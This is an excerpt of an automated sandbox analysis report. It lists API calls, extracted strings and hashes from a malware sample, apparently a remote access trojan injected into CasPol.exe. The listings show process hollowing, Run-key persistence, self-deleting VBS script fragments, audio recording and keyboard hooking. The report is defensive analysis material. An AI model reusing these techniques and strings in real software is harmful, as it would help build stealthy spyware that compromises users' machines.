                                                                                                            • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                            • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                                            • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                            • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                            • GetLastError.KERNEL32 ref: 004175C7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                            • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                                                                                            • API String ID: 4188446516-108836778
                                                                                                            • Opcode ID: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
                                                                                                            • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                                                            • Opcode Fuzzy Hash: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
                                                                                                            • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                                                                            APIs
                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                            • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                              • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                            • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                              • Part of subcall function 004127D5: RegCloseKey.KERNELBASE(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                            • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                            • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                            • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                            • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                              • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5EB
                                                                                                              • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B5FF
                                                                                                              • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000), ref: 0041B60C
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                            • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                            • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                              • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                            • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                            • API String ID: 4250697656-2665858469
                                                                                                            • Opcode ID: 825ed05686e146a340023780a1e1ca3d9c8f627674e2c185f9ef4d809754755e
                                                                                                            • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                                                            • Opcode Fuzzy Hash: 825ed05686e146a340023780a1e1ca3d9c8f627674e2c185f9ef4d809754755e
                                                                                                            • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                            APIs
                                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                                                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                              • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                              • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                                                                            • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                            • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                            • API String ID: 1861856835-3168347843
                                                                                                            • Opcode ID: 54cb0cc00aaf54ca5723f1f18b85bc7b7e81f165d8dadc6d20070f7a50f14127
                                                                                                            • Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
                                                                                                            • Opcode Fuzzy Hash: 54cb0cc00aaf54ca5723f1f18b85bc7b7e81f165d8dadc6d20070f7a50f14127
                                                                                                            • Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
                                                                                                            APIs
                                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                              • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                              • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                            • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                            • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                            • API String ID: 3797177996-1998216422
                                                                                                            • Opcode ID: e8105bd03a003de6c5dada70ee61526a4ba484f7441331beee26882055ccc7fa
                                                                                                            • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                                                                            • Opcode Fuzzy Hash: e8105bd03a003de6c5dada70ee61526a4ba484f7441331beee26882055ccc7fa
                                                                                                            • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                                                                            APIs
                                                                                                            • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                                                            • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                                                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                                                                            • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                                                                            • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                                                                            • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                                                                            • SetEvent.KERNEL32 ref: 0041A38A
                                                                                                            • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                                                            • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                                                            • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                                                                            • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                            • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                            • API String ID: 738084811-1408154895
                                                                                                            • Opcode ID: 42c4f1343a04b3ab5fe0180adc9416f5c847284e3e603b636eb4f112ec7e7d31
                                                                                                            • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                                                            • Opcode Fuzzy Hash: 42c4f1343a04b3ab5fe0180adc9416f5c847284e3e603b636eb4f112ec7e7d31
                                                                                                            • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                            • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                            • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                            • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                            • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                            • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                            • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                            • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                            • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$Write$Create
                                                                                                            • String ID: RIFF$WAVE$data$fmt
                                                                                                            • API String ID: 1602526932-4212202414
                                                                                                            • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                            • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                            • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                            • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                            • API String ID: 1646373207-165202446
                                                                                                            • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                            • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                            • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                            • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 0040BC75
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                                            • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                                            • _wcslen.LIBCMT ref: 0040BD54
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                                            • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000), ref: 0040BDF2
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                                            • _wcslen.LIBCMT ref: 0040BE34
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                                            • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                            • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$del$open$BG$BG
                                                                                                            • API String ID: 1579085052-1280438975
                                                                                                            • Opcode ID: 8eb7d02a36940a0ff91cf94f27f2f5ad6cb7c1a7bb912e115a66a538726193f8
                                                                                                            • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                                                            • Opcode Fuzzy Hash: 8eb7d02a36940a0ff91cf94f27f2f5ad6cb7c1a7bb912e115a66a538726193f8
                                                                                                            • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                                                            • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                                                                            • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                                                            • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                                                                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                                                                            • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                                                            • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                                                                            • _wcslen.LIBCMT ref: 0041B2DB
                                                                                                            • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                                                            • GetLastError.KERNEL32 ref: 0041B313
                                                                                                            • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                                                            • GetLastError.KERNEL32 ref: 0041B370
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                            • String ID: ?
                                                                                                            • API String ID: 3941738427-1684325040
                                                                                                            • Opcode ID: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
                                                                                                            • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                                                            • Opcode Fuzzy Hash: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
                                                                                                            • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                            • String ID:
                                                                                                            • API String ID: 3899193279-0
                                                                                                            • Opcode ID: c10670a696248be885c2c5ddf478444a83bcb0538a8bf01727ad035a034c0f59
                                                                                                            • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                                                            • Opcode Fuzzy Hash: c10670a696248be885c2c5ddf478444a83bcb0538a8bf01727ad035a034c0f59
                                                                                                            • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                              • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                            • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                                            • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                                            • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                            • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                            • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                            • String ID: /stext "$HDG$HDG$>G$>G
                                                                                                            • API String ID: 1223786279-3931108886
                                                                                                            • Opcode ID: 92c82ffc14c9d0d4cdbee43c6648559f3b797691cc56d5ec9c55932e8503e442
                                                                                                            • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                                                            • Opcode Fuzzy Hash: 92c82ffc14c9d0d4cdbee43c6648559f3b797691cc56d5ec9c55932e8503e442
                                                                                                            • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
